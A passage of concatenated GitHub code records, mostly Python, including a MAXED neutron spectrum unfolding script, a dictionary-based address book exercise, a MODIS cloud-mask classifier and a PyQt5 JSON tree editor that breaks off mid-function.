270)\n rand_y = random.randint(-270, 270)\n self.goto(rand_x, rand_y)","repo_name":"SamarthTech/Pyhton-GUI-Projects","sub_path":"SnakeGameImproved/food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"21895920671","text":"# This will run all of the case studies for my MAXED portion of my paper.\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import dual_annealing\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn.preprocessing import normalize\nimport imageio\nfrom scipy.stats import ttest_ind\n\nfont = {'size': 12}\nmatplotlib.rc('font',**font)\n\ndef Z(lamb, *params):\n # This function gets passed into the dual annealing function from scipy. \n # This function\n # guess_spec = the guess spectrum for the dual_annealing process\n # det_res_matrix = the response function that will be unfolded\n # std = the standard uncertainty of the detector response\n # det_res = actual measurement from the detectors\n # lamb = hyperparameters for minimization\n guess_spec, det_res_matrix, std, det_res = params\n omega = det_res.size\n # print(f'det_res_matrix.shape[0] is {det_res_matrix.shape[0]}')\n Z = np.abs(-guess_spec.dot(np.exp(-lamb.dot(det_res_matrix)))\n -(omega*(lamb.dot(std))**2)**0.5\n -det_res.dot(lamb))\n return Z\n\ndef unfold_Spectrum(guess_spec, lamb, det_res_matrix):\n # print(lamb.dot(det_res_matrix))\n print(-lamb.dot(det_res_matrix))\n return guess_spec*np.exp(-lamb.dot(det_res_matrix))\n\ndef run_case(gs, sm, drm, dr, dre, ts, mi, which_drm, which_spec, im_num, fig_names):\n # Variables:\n # gs - guess spectrum\n # sm - spectrum modifier\n # drm - detector response matrix\n # dr - detector response\n # dre - detector response error\n # ts - true spectrum\n # mi - maximum iterations for dual annealing\n params = (gs*sm, drm, dr*.1, dr)\n m = len(dr) # number of detectors in the detector response.\n bounds = list(zip([-10]*m, [10]*m))\n res = dual_annealing(Z, bounds, args=params, maxiter=mi) # minimize Z\n unfolded_spec = unfold_Spectrum(gs, res.x, drm) # unfold Z with lambdas (res.x)\n print(f't-test of spectrum: stat={ttest_ind(unfolded_spec,gs)[0]}, p={ttest_ind(unfolded_spec,gs)[1]}')\n det_res_unfolded = drm.dot(unfolded_spec)\n chi2_dr = (det_res_unfolded-dr).T.dot(np.linalg.inv(np.diag(dr*.1))).dot(det_res_unfolded-dr)\n MAC = np.dot(unfolded_spec,ts)**2/(np.dot(unfolded_spec,unfolded_spec)*np.dot(ts,ts))\n # chi2_spec = (unfolded_spec-ts).T.dot(np.linalg.inv(np.diag((ts+1e5)*.1))).dot(unfolded_spec-ts)\n\n print('The best results led to:')\n print(f' For the Detector Response: chi2 = {chi2_dr}, chi2 per DOF = {chi2_dr/m}')\n print(f' For the Spectrum: MAC = {MAC}')\n fig,(ax0,ax1) = plt.subplots(1,2)\n fig.suptitle('MAXED Unfolding Spectra Results\\n' + f'DRM: {which_drm}\\n' + f'Guess Spectrum: {which_spec}*{sm}')\n \n ax0.step(E_bins, unfolded_spec, label='Unfolded', color='#1f77b4')\n ax0.step(E_bins, ts, label='Real', linestyle=':', color='#ff7f0e')\n ax0.step(E_bins, gs*sm, 'k', label='Guess', linestyle='--')\n ax0.semilogx()\n ax0.set_ylabel('Fluence per Unit \\nLog Energy (Lethargy)')\n ax0.set_xlabel('Energy (MeV)')\n ax0.set_ylim((0,1))\n ax0.legend(loc='upper left', fontsize=8)\n # ax0.text(1e-9,.2,f'$\\chi^2$ = {round(chi2_dr,2)}')\n ax0.text(1e-9,.2,f'MAC = {round(MAC,5)}')\n # ax0.text(1e-9,.1,f't={round(ttest_ind(unfolded_spec,gs)[0],2)}',fontweight='normal')\n ax0.set_title('Spectrum Comparison')\n \n # radii = [14, 13, 12, 11, 10, 9, 8, 6, 3, 0]\n if len(dr) == 10:\n radii = [0, 3, 6, 8, 9, 10, 11, 12, 13, 14]\n else:\n radii = [14,13,12,11,10,9,8,6,3,0,-3,-6,-8,-9,-10,-11,-12,-13,-14,\n 14,13,12,11,10,9,8,6,3,0,-3,-6,-8,-9,-10,-11,-12,-13,-14,\n 14,13,12,11,10,9,8,6,3,0,-3,-6,-8,-9,-10,-11,-12,-13,-14]\n ax1.scatter(radii, det_res_unfolded, s=10, label='Unfolded', color='#1f77b4')\n ax1.scatter(radii, dr, s=10, label='Real', color='#ff7f0e')\n ax1.errorbar(radii, dr, yerr=dre, capsize=5, linestyle=None, color='#ff7f0e')\n ax1.set_ylabel('Fluence Response (-)')\n ax1.set_xlabel('PNS depth (cm)')\n ax1.set_ylim((0.01,0.2))\n ax1.legend(loc='upper left', fontsize=8)\n ax1.text(8,.15,f'$\\chi^2$ = {round(chi2_dr,2)}')\n # ax1.text(6,.1,f't={round(ttest_ind(det_res_unfolded,dr)[0],2)}',fontweight='normal')\n ax1.set_title('Detector Response Comparison')\n\n fig.tight_layout()\n # fig.show()\n fig_name = f'{which_drm}_{which_spec}_{im_num}.png'\n fig.savefig(fig_name,dpi=300)\n fig_names.append(fig_name)\n return fig_names\n\ndef make_gif(path,filenames):\n with imageio.get_writer(path, mode='I', duration=0.5) as writer:\n for filename in filenames:\n image = imageio.imread(filename)\n writer.append_data(image)\n###-------------------------------------------------------------------------###\n# Convert IAEA Cf-252 spectrum into AWE energy bins #\n###-------------------------------------------------------------------------###\nIAEA_spectra_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\03-IAEA_Spectra\\IAEA_Spectra_84_Ebins.csv')\nspec_names = IAEA_spectra_df.columns\nIAEA_spectra = IAEA_spectra_df.to_numpy()\n\n# The various spectra. The spectra names (and corresponding column indices) can\n# be found in the spec_names variable.\nCf_spec = IAEA_spectra[:,1]\nD2O_mod_Cf_spec = IAEA_spectra[:,2]\nAmB_spec = IAEA_spectra[:,4]\nH2O_mod_PuBe_spec = IAEA_spectra[:,9]\n\nE_bins = np.array([1e-9,1.58e-9,2.51e-9,3.98e-9,6.31e-9,\n 1e-8,1.58e-8,2.51e-8,3.98e-8,6.31e-8,\n 1e-7,1.58e-7,2.51e-7,3.98e-7,6.31e-7,\n 1e-6,1.58e-6,2.51e-6,3.98e-6,6.31e-6,\n 1e-5,1.58e-5,2.51e-5,3.98e-5,6.31e-5,\n 1e-4,1.58e-4,2.51e-4,3.98e-4,6.31e-4,\n 1e-3,1.58e-3,2.51e-3,3.98e-3,6.31e-3,\n 1e-2,1.58e-2,2.51e-2,3.98e-2,6.31e-2,\n 1e-1,1.26e-1,1.58e-1,2e-1,2.51e-1,3.16e-1,3.98e-1,5.01e-1,6.31e-1,7.94e-1,\n 1e0,1.12e0,1.26e0,1.41e0,1.58e0,1.78e0,2e0,2.24e0,2.51e0,2.82e0,3.16e0,\n 3.55e0,3.98e0,4.47e0,5.01e0,5.62e0,6.31e0,7.08e0,7.94e0,8.91e0,\n 1e1,1.12e1,1.26e1,1.41e1,1.58e1,1.78e1,2e1,2.51e1,3.16e1,3.98e1,5.01e1,6.31e1,7.94e1,1e2])\n\n###-------------------------------------------------------------------------###\n# Import detector response matrices #\n###-------------------------------------------------------------------------###\n# Detector response matrix for the plane source, depth-averaged tallies:\nplane_avg_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\01-Detector_Response_Matrices\\DRM_PlaneSource_1e10nps_Li6_averagedMeanTallies.csv')\nplane_avg_drm = plane_avg_drm_df.to_numpy()[0:10,1:].astype('float64')\nplane_avg_drm = normalize(plane_avg_drm,axis=1,norm='l1')\n\n# Detector response matrix for the spherical source, depth-averaged tallies:\nspheric_avg_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DRM_SphericalShellSource_1e10nps_Li6_averagedMeanTallies.csv')\nspheric_avg_drm = spheric_avg_drm_df.to_numpy()[0:10,1:].astype('float64')\nspheric_avg_drm = normalize(spheric_avg_drm,axis=1,norm='l1')\n\n# Detector response matrix for the plane source, all tallies separate:\nplane_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DRM_PlaneSource_1e10nps_Li6_meanTallies.csv')\nplane_drm = plane_drm_df.to_numpy()[0:57,1:].astype('float64')\nplane_drm = normalize(plane_drm,axis=1,norm='l1')\n\n# Detector response matrix for the spherical source, all tallies separate:\nspheric_drm_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DRM_SphericalShellSource_1e10nps_Li6_meanTallies.csv')\nspheric_drm = spheric_drm_df.to_numpy()[0:57,1:].astype('float64')\nspheric_drm = normalize(spheric_drm,axis=1,norm='l1')\n\n# Random detector response matrix:\nrandom_drm = np.random.random((10,84))\nrandom_drm = normalize(random_drm,axis=1,norm='l1')\n\n###-------------------------------------------------------------------------###\n# Import detector responses #\n###-------------------------------------------------------------------------###\n# Detector response from LLNL's run 1, Cf-252 source at 300cm from PNS. I used\n# only the Li6 values rather than subtracting out the Li7 measurement.\ndr_LLNL_run1_df = pd.read_csv(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\DR_Cf252_300cm_Li6.csv')\ndr_LLNL_run1 = dr_LLNL_run1_df.to_numpy()[0:57,1].astype('float64')\n\ndr_LLNL_run1_avg = np.zeros((10))\nfor i in range(10):\n dr_LLNL_run1_avg[i] = (dr_LLNL_run1[i]+dr_LLNL_run1[18-i]+dr_LLNL_run1[19+i]+dr_LLNL_run1[37-i]+dr_LLNL_run1[38+i]+dr_LLNL_run1[56-i])/6\n# dr_LLNL_run1_avg = dr_LLNL_run1_avg/np.linalg.norm(dr_LLNL_run1_avg)\ndr_LLNL_run1_avg = dr_LLNL_run1_avg/sum(dr_LLNL_run1_avg)\n# dr_LLNL_run1 = dr_LLNL_run1/np.linalg.norm(dr_LLNL_run1)\ndr_LLNL_run1 = dr_LLNL_run1/sum(dr_LLNL_run1)\n\n# ###-------------------------------------------------------------------------###\n# # Save a figure for the detector response only ###\n# ###-------------------------------------------------------------------------###\n# fig,ax = plt.subplots()\n# radii = [0,3,6,7,8,10,11,12,13,14]\n# ax.scatter(radii, dr_LLNL_run1_avg, s=10, color='#ff7f0e')\n# ax.errorbar(radii, dr_LLNL_run1_avg, yerr=0.1*dr_LLNL_run1_avg, capsize=5, linestyle=None, color='#ff7f0e')\n# ax.set_ylabel('Fluence Response (normalized)')\n# ax.set_xlabel('TLD depth (cm)')\n# ax.set_ylim((0.01, 0.2))\n# ax.set_title('PNS Detector Response')\n# fig.tight_layout()\n# fig_name = 'Example_PNS_dr.png'\n# fig.savefig(fig_name,dpi=300)\n\n# ###-------------------------------------------------------------------------###\n# # Case 1 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 1: Planar source, depth averaged')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 2 #\n# # DRM: Spheric Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Spherical_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 2: Spherical Source, depth averaged')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,spheric_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_sphericDRMavg_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 3 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 at 90% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.9\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod90percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 3: Planar source, depth averaged, guess spectrum at 90%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_gs90percent_LLNLrun1.gif',fig_names)\n\n\n# ###-------------------------------------------------------------------------###\n# # Case 4 #\n# # DRM: Spheric Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 at 90% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.9\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Spherical_Source_DRM_avg_GSmod90percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 4: Spheric source, depth averaged, guess spectrum at 90%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,spheric_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_sphericDRMavg_gs90percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 5 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA Cf-252 at 50% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.5\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod50percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 5: Planar source, depth averaged, guess spectrum at 50%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_gs50percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 6 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA D2O mod Cf at 100% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA D2O Moderated Cf Spectrum'\n# fig_names = []\n# print('Case 6: Planar source, depth averaged, D2O Moderated Cf guess spectrum at 100%')\n# for i in range(1):\n# run_case(D2O_mod_Cf_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_D2O-mod-Cf_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 7 #\n# # DRM: Planar Source, depth averaged #\n# # Detector Response: LLNL #\n# # Guess Spectrum: IAEA H2O mod PuBe at 100% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Planar_Source_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA H2O Moderated PuBe Spectrum'\n# fig_names = []\n# print('Case 7: Planar source, depth averaged, H2O Moderated PuBe guess spectrum at 100%')\n# for i in range(1):\n# run_case(H2O_mod_PuBe_spec,spec_mod,plane_avg_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_planeDRMavg_H2O-mod-PuBe_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 8 #\n# # DRM: Random DRM #\n# # Detector Response: LLNL #\n# # Guess Spectrum: Cf Spectrum at 100% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 1\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Random_DRM_avg_GSmod100percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 8: Random DRM, Cf-252 guess spectrum at 100%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,random_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_randomDRMavg_Cf-252_gs100percent_LLNLrun1.gif',fig_names)\n\n# ###-------------------------------------------------------------------------###\n# # Case 9 #\n# # DRM: Random DRM #\n# # Detector Response: LLNL #\n# # Guess Spectrum: Cf Spectrum at 50% #\n# ###-------------------------------------------------------------------------###\n# spec_mod = 0.5\n# maxiter = 1000 # for the maximum iterations that dual_annealing will allow\n# which_drm = 'Random_DRM_avg_GSmod50percent'\n# which_spec = 'IAEA Cf-252 Spectrum'\n# fig_names = []\n# print('Case 9: Random DRM, Cf-252 guess spectrum at 100%')\n# for i in range(1):\n# run_case(Cf_spec,spec_mod,random_drm,dr_LLNL_run1_avg,0.1*dr_LLNL_run1_avg,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\n# make_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_randomDRMavg_Cf-252_gs50percent_LLNLrun1.gif',fig_names)\n\n###-------------------------------------------------------------------------###\n# This section will use the IAEA Cf-252 spectrum with the DRM to calculate a \n# detector response. This response will be compared with the response from\n# LLNL and will be used in MAXED\n###-------------------------------------------------------------------------###\ndr_calc = np.dot(Cf_spec,plane_avg_drm.T)\nspec_mod = 0.5\nmaxiter = 1000\nwhich_drm = 'CalcDR_Planar_Source_DRM_avg_GSmod100percent'\nwhich_spec = 'IAEA Cf-252 Spectrum'\nfig_names = []\nprint('Case 10: Planar source, depth averaged')\nprint(plane_avg_drm.shape)\nprint(dr_calc.shape)\nfor i in range(1):\n run_case(Cf_spec,spec_mod,plane_avg_drm,dr_calc,0.1*dr_calc,Cf_spec,maxiter,which_drm,which_spec,i,fig_names)\nmake_gif(r'C:\\Users\\zacht\\OneDrive\\PhD\\Data\\02-MAXED\\gif_drCalc_planeDRMavg_gs100percent_LLNLrun1.gif',fig_names)","repo_name":"ZachCondon/PhD","sub_path":"Data/02-MAXED/MAXED_cases.py","file_name":"MAXED_cases.py","file_ext":"py","file_size_in_byte":19739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2200803139","text":"# Write an address book, using dictionaries, where I can query contact info, insert new contact, delete contact information, exit\n# address book program\ndict_1 = {}\nwhile True:\n\n acivity = input('Type q to quit or f to find an info or d to delete info from dict.book or i to insert new info:')\n if acivity == 'q':\n break\n elif acivity == 'f':\n name_dict = input('Input the name to find:')\n if name_dict in dict_1:\n print('The info is:',dict_1[name_dict])\n\n else:\n print('Name is not in dict!!!')\n\n elif acivity == 'i':\n name_dict = input('Input the name to insert: ')\n info_dict = input('Input the info to insert: ')\n dict_1[name_dict] = info_dict\n elif acivity == 'd':\n name_del = input('Input the name to del: ')\n del dict_1[name_del]\n else:\n print('Type q to quit!!!')\n print('You input incorrect letter what to do!!!')\n\n\n\n","repo_name":"ivankoffpavel/BeetRootTasks","sub_path":"Lessons/Lesson 7/Classroom 7/Lesson7_6.py","file_name":"Lesson7_6.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41240194731","text":"import os\nimport numpy as np\nimport sklearn\nfrom sklearn.naive_bayes import GaussianNB\nfrom modis_dataset_gen import modis_dataset_generator\nfrom modis_cld_msk import cloud_mask_generator\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.svm import SVC\n\ndef gaussian_naive_bayes(training_data,training_labels):\n clf = GaussianNB()\n clf.fit(training_data,training_labels)\n y_pred = clf.predict(training_data)\n print(accuracy_score(training_labels,y_pred)*100)\n return\ndef pca_data(training_data,no_components=2):\n pca = PCA(n_components=no_components)\n return pca.fit_transform(training_data)\n\ndef SVM(training_data,training_labels,pca=False):\n clf = SVC()\n if(pca==True):\n training_data = pca_data(training_data)\n clf.fit(training_data,training_labels)\n y_pred = clf.predict(training_data)\n print(accuracy_score(training_labels,y_pred)*100)\n return\n\n#arr = #assume the array is obtained\n#modis_dataset_generator(\"MOD021KM.A2004026.1230.006.2014218105922.hdf\",\"output1.npz\",\"MOD03.A2004026.1230.006.2012274025923.hdf\")\ncurr_data = np.load(\"sample10.npz\")\n\ncurr_image = curr_data[\"arr_0\"]\n\n#labels_file = cloud_mask_generator(\"MOD06_L2.A2004026.1230.006.2014332063358.hdf\",\"label_output.npz\",True)\nlabels_dict = np.load(\"mask10.npz\")\nimage_labels = labels_dict[\"cloud_mask\"]\n\ngaussian_naive_bayes(curr_image,image_labels)\nSVM(curr_image,image_labels)\nSVM(curr_image,image_labels,True)\n\n#no_components = 2\n\n#print(curr_image.shape)\n\n\n\n\n\n\n\n#def main():\n","repo_name":"chink2016/MAIA_code","sub_path":"MAIA_system/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34012751295","text":"# Std\nimport collections\nimport json\nimport sys\nimport os\n# External\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\n\ntry:\n from PyQt5.QtCore import QStringList\nexcept ImportError:\n QStringList = list\n\nQtCore.QTextCodec.setCodecForLocale(QtCore.QTextCodec.codecForName(\"gb18030\"))\n\n\nTREE_STYLESHEET = ''' \n QTreeWidget::item { border-bottom: 1px solid black;}\n \n QTreeWidget::item:selected { background-color: #366be7; border-color:blue; \n border-style:outset; border-width:0px; color:white; }\n '''\n \nTEXT_STYLESHEET = '''\n background-color: white;\n color: black;\n selection-background-color: #606060; selection-color: white;\n'''\n\nclass JsonView(QtWidgets.QWidget):\n\n def __init__(self):\n \n \n super(JsonView, self).__init__()\n\n #Load file\n self.tree_widget = None\n self.textEdit = QtWidgets.QTextEdit()\n self.TempEdit = QtWidgets.QTextEdit()\n self.textEdit.setStyleSheet(TEXT_STYLESHEET)\n\n filenames = QStringList()\n\n #define widgets\n self.savefile_btn = QtWidgets.QPushButton(\"儲存\")\n self.filenames = filenames\n self.savefile_btn.clicked.connect(self.Save_textEdit)\n self.restart_btn = QtWidgets.QPushButton(\"重啟\")\n self.restart_btn.clicked.connect(self.restart)\n self.open_btn = QtWidgets.QPushButton(\"開啟檔案\")\n self.open_btn.clicked.connect(self.OpenFile)\n self.SaveAs_btn = QtWidgets.QPushButton(\"另存新檔\")\n self.SaveAs_btn.clicked.connect(self.Save_as)\n self.find_lineEdit = QtWidgets.QLineEdit()\n self.find_btn = QtWidgets.QPushButton(\"尋找\")\n self.find_btn.clicked.connect(self.find_word)\n self.settings = []\n\n self.reload_btn = QtWidgets.QPushButton(\"重新讀檔\")\n self.reload_btn.clicked.connect(self.Reload)\n\n # Tree\n self.tree_widget = QtWidgets.QTreeWidget()\n self.tree_widget.setHeaderLabels([\"Key\", \"Value\"])\n self.tree_widget.header().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)##\n selmodel = self.tree_widget.selectionModel()\n selmodel.selectionChanged.connect(self.handleSelection)\n self.tree_widget.setContextMenuPolicy(QtCore.Qt.CustomContextMenu) \n self.tree_widget.customContextMenuRequested.connect(self.contextMenu)\n self.tree_widget.setStyleSheet(TREE_STYLESHEET)\n\n #add widgets to layout\n layout = QtWidgets.QHBoxLayout()\n layout.addWidget(self.tree_widget)\n layout.addWidget(self.textEdit)\n self.table_gbox = QtWidgets.QGroupBox(\"filenames\")\n self.table_gbox.setLayout(layout)\n\n layout1 = QtWidgets.QHBoxLayout()\n layout1.addWidget(self.open_btn)\n layout1.addWidget(self.savefile_btn)\n layout1.addWidget(self.SaveAs_btn)\n layout1.addWidget(self.reload_btn)\n layout1.addWidget(self.restart_btn)\n acts_btn_gbox = QtWidgets.QGroupBox('Actions')\n acts_btn_gbox.setLayout(layout1)\n\n layout3 = QtWidgets.QVBoxLayout()\n layout3.addWidget(self.find_lineEdit)\n layout3.addWidget(self.find_btn)\n layout3.addWidget(acts_btn_gbox)\n layout3.addWidget(self.table_gbox)\n self.setLayout(layout3)\n self.LoadSettings()\n \n def rc(self, rel_path):\n \"\"\"Return full path of resource according to rel_path.\"\"\"\n if not hasattr(sys, '_MEIPASS'):\n # for elder PyInstaller.\n rc_path = os.environ.get(\"_MEIPASS2\", os.getcwd())\n else:\n rc_path = getattr(sys, '_MEIPASS', os.getcwd())\n return os.path.join(rc_path, rel_path)\n \n def LoadSettings(self):\n #尋找打包後讀取settings的solution\n filename = self.rc('settings.json')\n # filename = os.path.join(os.environ['_MEIPASS2'], filename)\n if not self.settings:\n try:\n open(filename, 'r')\n self.settings.append(filename)\n except FileNotFoundError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請先選擇settings檔', QtWidgets.QMessageBox.Yes)\n \n dlg = QtWidgets.QFileDialog()\n dlg.setFileMode(QtWidgets.QFileDialog.AnyFile)\n if dlg.exec_():\n self.settings = dlg.selectedFiles()\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '請確認settings檔案是否無誤', QtWidgets.QMessageBox.Yes)\n sys.exit()\n \n try:\n with open(self.settings[0], 'r') as f:\n settings = json.load(f)\n self.CAN_DELETE = settings['CAN_DELETE'] #可選填\n self.CAN_DELETE_CHILD = settings['CAN_DELETE_CHILD'] #子可以刪掉\n self.CANNOT_EDIT_VALUE = settings['CANNOT_EDIT_VALUE'] #value不可修改\n self.VALID_KEYS = settings['VALID_KEYS']\n self.CONFIG_SET_KEYS = settings['CONFIG_SET_KEYS']\n self.AI_FEATURES_SETS = settings['AI_FEATURES_SETS']\n self.AI_FEATURES_KEYS = settings['AI_FEATURES_KEYS']\n self.ROIOBJ_KEYS = settings['ROIOBJ_KEYS']\n self.VALID_KEYS.extend(self.CONFIG_SET_KEYS)\n self.VALID_KEYS.extend(self.AI_FEATURES_KEYS)\n self.VALID_KEYS.extend(self.ROIOBJ_KEYS)\n self.VALID_KEYS.extend(self.CANNOT_EDIT_VALUE)\n\n self.SETTINGS_KEYS = ['CAN_DELETE', 'CAN_DELETE_CHILD', 'CANNOT_EDIT_VALUE', 'VALID_KEYS', 'CONFIG_SET_KEYS', 'AI_FEATURES_KEYS', 'ROIOBJ_KEYS']\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '請確認settings檔案是否無誤', QtWidgets.QMessageBox.Yes)\n sys.exit()\n def contextMenu(self, point):\n self.menu = QtWidgets.QMenu(self)\n self.menu.addAction('新增child', self.itemInsert)\n self.menu.addAction('刪除', self.itemDelete)\n self.menu.addAction('複製', self.itemDuplicate)\n self.menu.exec_( self.focusWidget().mapToGlobal(point) )\n\n def OpenFile(self):\n self.LoadSettings()\n dlg = QtWidgets.QFileDialog()\n dlg.setFileMode(QtWidgets.QFileDialog.AnyFile)\n if dlg.exec_():\n filenames = dlg.selectedFiles()\n self.filenames = dlg.selectedFiles()\n try:\n with open(filenames[0], 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n \n data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(data1)\n self.tree_widget.clear()\n jfile = open(filenames[0])\n jdata = json.load(jfile, object_pairs_hook=collections.OrderedDict)\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(jdata, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.table_gbox.setTitle(filenames[0])\n self.tree_widget.expandAll()\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非合規的Json檔', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n\n def Reload(self):\n try:\n with open(self.filenames[0], 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(data1)\n self.tree_widget.clear()\n jfile = open(self.filenames[0])\n jdata = json.load(jfile, object_pairs_hook=collections.OrderedDict)\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(jdata, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.table_gbox.setTitle(self.filenames[0])\n self.tree_widget.expandAll()\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非Json檔案', 